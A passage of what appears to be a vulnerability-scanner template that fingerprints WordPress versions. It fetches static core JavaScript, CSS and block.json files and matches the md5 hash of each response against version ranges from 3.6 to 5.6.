"{{BaseURL}}/wp-includes/js/dist/a11y.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"8227a618a371014e3b3eb4c23607a25f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a65acec117c4a1fb5f4899bdff312101\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"1a379c26f6d2df6017d269402c6237d0\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"6de67fd83bc890138ef16f2edcf72c7f\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f6c9ab109fb2f780042c6d76f31c932c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"458e5811b2646a6998945e8086da0dbe\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"5321c4e1c69f02d0b44438859a5ef257\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"00ec349ebc2a18936384a4820b49f29d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/i18n.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"53267e22d19e925551ff2f6eecb60c07\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"36f7bb8a849f3fa8e0887c87852af057\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"04879f14a95cd381ffe4198d685f9493\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"88e1c5f8e0b6388d6f3c562c61523029\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"f00c40f7643bc657eb99fadcc63edb63\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4d196dccc22591c69e5146e3c4d25a7e\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"11841368d799ad3d3a0eb29350272675\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"582c60610a05cb241219e36fc819828f\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/list-reusable-blocks.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"4d9fa198a4229643fa7b513d81d16bd5\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4e9716f165ab70db6f6aed5e5d0cf5cc\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"08b1277b8584f3a9b4da31de1f6b26eb\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"221072737493c7bce035330aaac6fe4b\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"2d8d787282fe64ecffa60624501cef47\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"2736c416eb320581f85a98e39d473347\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"146d338a5e671762578541c6f26c3386\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4b7dc7c7a72767069d5def4625240f07\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/a11y.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"cb439a67a2dbdefec09fec7b57ef64df\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"a7effde2a07e0cd212c26e2423cd7157\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"d95ae5d80773496840254ac17641e9b2\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.4 - dsl: - - "(\"8b973a699296092e4a14ee6c0ce90cbd\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8e71effe9f05c722150d7e55d65bac7d\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1f6917e48f6152db9b461733232240ee\" == md5(body))" - - type: dsl - name: 5.3.5 - 5.3.6 - dsl: - - "(\"f2a1bdcc4acf8cd53814ab777500838c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8c0772e68b1ada104fe3ae885d3a9fe4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/components/style-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"09c39ec3f3e981006dc89fcbd719ec3e\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"c1b549e7ed316bf5a1d38d545923230e\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"0a420d9268a69cc187b3578bc2a7f8af\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"f77485415d0e8f8227b7b8d532c7080a\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"58a83301414521c957ebbd1e1962431d\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c14fbc464761ecbc3f49c5416aabf658\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"ff2e2dd6cbdd6cd849c3c6dd9e18d4ae\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"c8f2bae9a2da091777c345e132b151ec\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"610ffd816df7670a3483fc56a6f46e9d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/components/style-rtl.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"5617ee3edf64f82ccf793554fdcc6dc0\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"23207926b6554158a37d95234a23414f\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2c8cc2a3fc8fcec1e44eb8dbdfc96dc0\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"dffc8b4f8ef9b60d0ad4e21654b9969f\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"0edc3e519c5043a2cb9019ea92dcfdfb\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"110d7a6ca1609929fee74f3155516a00\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"b3ee6a2f7296435db208f4de00d460f7\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"3e655c9c09378dfc1af4825ffe5d8297\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5eb72aee24af648536d2c19d2f8abd74\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/components/style.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"418b43fb785b1e323213ed7935295a1a\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"ceaf3c35802604ba2964561a5c15cafd\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"2600d32822603f50e0070a9e02e96cbb\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"ed45deda459cc27cd7b0b09037ce4154\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"90d3b8307d3d10eedac6ef17ade705d0\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ca90f19f5f90739b10f7e5bb34daf8e8\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"0981c860400ea6df276bdc7ba6ea7768\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"296cdbcc05ec6e76493b21ee95f94c45\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"dbccf2ded65bbf13ff78161a9789930d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/components/style.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.2 - dsl: - - "(\"db3e76f8a41f16d9e261a66b65b233dc\" == md5(body))" - - type: dsl - name: 5.0.3 - 5.0.11 - dsl: - - "(\"50242e6ba592897625683280e2cc183d\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"cb6ee69248476280b7e041e28bca75e6\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"8b8c3d03d4a83aca7779e61210443cfc\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"df32fa0a51fae2f512a26cce865dff85\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"41c395e5312889d5b6281119982b9021\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"e5f31a8068c0da0c9cc09d60e3038d32\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"9ea8e47b2542b63e79e7933135d50adb\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"af4749ef59d8f6b2c738b5ec56c8104d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/editor.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"779eb4c7814b3e82228e77306d7537bd\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"d6824fcfdbd1dd2cae2ecd53818838da\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.1 - dsl: - - "(\"a7e48e59fa5aec35ff1446a3e12c33e7\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"cb2cd4c20d793c93e10f59dcddf70f30\" == md5(body))" - - type: dsl - name: 5.1.2 - 5.1.8 - dsl: - - "(\"adf9cddda7c0c97d8a188b3506355be4\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"3e71e641d1fca36fe6b0169145d9d10e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"23fb73a8d74154cb905fe8b69c437c65\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"f65c797ff4bdc97a61590c4106b43a52\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"45c2303a86c0b0cc5aa90af55f7100db\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"a080a4d6eed93194ba7be0beb8d99945\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ba7d6f34c9eeef4579940d4a4dc03ff3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/dist/block-library/editor-rtl.min.css" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"7f4b34c7ab664222bae7d3561c41068c\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"6e977885a56d7fb205284b679d545717\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.1 - dsl: - - "(\"ebc57eca1ff3628452d09629ce51047a\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"c29329e44d6e8bdd19c6ef3e2ce5bd9a\" == md5(body))" - - type: dsl - name: 5.1.2 - 5.1.8 - dsl: - - "(\"81825ed3f80e128dcef13220deff02b9\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.3 - dsl: - - "(\"d703f2178551d235ce107c8b7f5e5e61\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"79c315d92ea0fd866722db3618ef50d3\" == md5(body))" - - type: dsl - name: 5.3.4 - 5.3.6 - dsl: - - "(\"cfe89277798e51f685aafac401edfe72\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.1 - dsl: - - "(\"1d563107274d6f3d954b8071d0a55a45\" == md5(body))" - - type: dsl - name: 5.5.2 - 5.5.3 - dsl: - - "(\"6cf2fbd6cfe5a53b5c22433e0fdf7f33\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2870907da358f5e21bf0e3f1875074c0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/html/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0b39e466dcab40ea8f304d042ce179ec\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3798eb8f3d92dd791dd24700c2271959\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/column/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f4d6c66d01690e0fce9bb2d23c720769\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"621627beadf310b9b990a5e345f634ee\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/separator/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"aabe1dda90559a88e3874f809c6b302b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"907c5bdfeffab73a8c024f060a5db2c1\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/classic/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"adee64873f7bb0d68f446ccf49db0b71\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8c9a109c2571beec1b1cd39e53f2eea0\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/more/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e32e6a6c2f9cb966729c317d2aad9785\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"1b1cdbe8af4f0d583a377f8659a77f60\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/archives/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"32823791a845af271ff8c3fcd35e5c9c\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5a445473f9b5e1a4e1ed33df97f11434\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/list/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"4283f9b36dcf7670502d3989fdca8715\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d37bdde94db55890c60cbddfcd7a63e7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/latest-comments/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b8d732e95d6635b79ae28481748bbcb8\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9d6d2762ad00fe9e3021a27112643de3\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/categories/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"6c289cf6ab5f8552752ddf00b5489bb1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"4c97ec7175e2af6a59eb15f3e319f23e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/text-columns/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"59e2a5f827be60dbba2d2380480ae524\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b92afdee7ec920a842e2be0d12ce2499\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/spacer/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"909f07a23f82a1d7d47bffd91ddd0f65\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9b39f563b5c3a308ca9b1a826d2c6e46\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/nextpage/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9b715eaeb2ced0c57cf4e3c386fb2d1e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e51d57b68dbcab3751b0ad292ac4c8fb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/pullquote/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b839b85457fe74c1b9d6f166a152dfd5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ed9a40823cbcd20da93cbab5a21e279a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/subhead/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"41a3f35bbe43fa1af83e58f9bf158ceb\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a863d67a878fba1f866c8bc05197bd86\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/table/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c4fe6d72ffb2f1278ba622d364052076\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"6a123d969e677f1bd05d4af3223a6834\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/rss/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"23694f35af5267032e9d4548cff976e8\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3583b062ddcda7b24a3976fd4f195513\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/columns/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"41ab9bd1a6771c071e54bbe659134266\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"55af73e6756fd7463dbfe80db51e501c\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/button/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c7afe532f1dd6306dc9b0902a90d7812\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"be97ad5ccacf2742dad5b50a2d67b5b2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/heading/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d5922b3f79c5c2b67db0ec2517ce073d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"86ffc61cd4d57f61b89df17000eb69ab\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/social-links/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"10a3aed698839aa91f245b0c001ee2ea\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3e284b35d1950853bba5e966b249fcaf\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/group/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d3be4e6b16625cdf0c8528a3cef7dc54\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a7e88fca718b97a35a8dd4597b19e805\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/media-text/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"c92d0c96d3c577711c04aeafde2ec3f6\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"cbf874d7ffa569e49811820fbc9f97df\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/block/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e8e49e3c9c93d5a42814e75162daf324\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3a4de2dda586eb9d1a97e5ca9165052b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/buttons/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5bc68f8f8a590862671b1a9943def5f3\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2bccd4df2e0027b1605f32cf6b109e5d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/paragraph/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5efcb514b695d4e1c0403e2e3b1d266f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"28991e3ae8bababa834bbdf0a08519d9\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/missing/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"237a65525f167fb21c105ad80861d3b7\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ba2412b859d4ba22394eca145274d566\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/quote/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"7964f7c327c1c6edb0628767693cfe2d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"9e98dac0f8ea0a0029e0e5a0bd31d495\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/calendar/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"19f82b9ca4c05c0f6b4c33564dce5d32\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b66a05d7ebbb15387348a33c721f9b3a\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/image/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"9cc125bbd91c86051a74b19c602d09f9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"651f818043ebd9b2a36002c77aa4099e\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/tag-cloud/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"75f4f8b4009e14fc323e6942f9571de9\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"052287ea36440570123519d03c728202\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/audio/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"10a618237f615b92ca220a4616050d7b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a8853b818eea4a56f68ce738e1cd2b20\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/latest-posts/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"130991aa9a24862eecb4cc74a3dde76b\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"655ec3498b3fd3eef512a4773e5e1655\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/video/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"0e547adddb611126e305babce207a0ea\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e204095892b1ed43e0db7ec6f041d441\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/verse/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"efc6b180800772fc581603adca739b87\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"2cf2a27cb66ace196738b54da11ba85b\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/code/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"db474f9685478365ba812657769bba9a\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5f9688205db939b5a47e136eddc7ad55\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/file/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"1ef23efdda9cecde00ebe785e98482ba\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"f7c0056bf419ca380fcfec88dc8e5831\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/gallery/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"e30565787c3717bf735162d344bc5c70\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"3f3774e67c95d12408d1b1bd1196ad01\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/search/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b56b4486e42ff65eea9b1a2d304f6c48\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5396d05f685b6aa5d2153734be2a17f7\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/blocks/preformatted/block.json" - matchers: - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"535fe1ff4cb39ac5a6f5a4112c32519e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"b3820f941e2ff1b686af5f9a7d369cc5\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-auth-check-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"3c6435cd046cb20503989540df6bb299\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"b1e98d74916d7911bcc284eab254e2cb\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"5bbe4c2ecb541952ca408683e79fbb14\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"f8fa4bcad00bddea5fc40dc4701ada1a\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"f25622d7920e308f35585f91572ac755\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"476e2bbfe969e737181ae9cfe762ef24\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"4d6ca4acefd6ee3f4c49019bdc19ef48\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"1f55126b05501747659d2db0df9f8334\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"7496cd0ac9641aebc1bad0b7a4d3e7f8\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"221cc5e1242083531de5c2216954fa50\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"aebfde61667894a8e13fec6e3485bdeb\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"ff073acb3f9177edfdcd35dfcd63fd71\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"095feb4ad3dc9c26670120c0f29dac10\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d4595757af421829b1524064511718ee\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"66f665a8de6a6f123b28cefae46557eb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/wp-auth-check.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"075a4ec4f5c24b7af6f879983f00e477\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"e888776b29d7888acda2e33b4131d3fa\" == md5(body))" - - type: dsl - name: 4.5 - 4.7.3 - dsl: - - "(\"d1f94f9a93f83b7dc4d924f04842d294\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b26b83796f3aa0f932585cce3925be33\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"82e0a49003600469a595f3362d318f2c\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"eb60fd346a4039fdcf5912fce6dd1ad1\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"9ed9dabd94f3a18eb8574dc2bd394ed2\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a37b3bb02583097a4a502df1d7e5cb25\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"08ccdd663a722b4551a3e7ff24b510a6\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"32a98483f9e4f78c17548372b940002a\" == md5(body))" - - type: dsl - name: 3.6 - 3.7.35 - dsl: - - "(\"13e3438edb73cd886466b480efde70b7\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"b7cbb99a4dcb90b4b6014ebd3c706226\" == md5(body))" - - type: dsl - name: 5.0 - 5.2.9 - dsl: - - "(\"a25e23b0eceedaebe5046299e1b2b7a2\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"db371a9bb3c8050843197400f68ba9df\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"aa04fc708866d04dbd758e16ac9293c1\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"a8dcad07317fa0500b76284fd890dee8\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog.min.css" - matchers: - - type: dsl - name: 4.5 - 4.8.15 - dsl: - - "(\"dae18845cfc3c211c5c6de92401b2ad5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"dff3dd1a74dba4b1f43eb186e66527fc\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"726d1f1796a539919fd0406404dd24e2\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"e00e1d287de9b4f665427b781153090b\" == md5(body))" - - type: dsl - name: 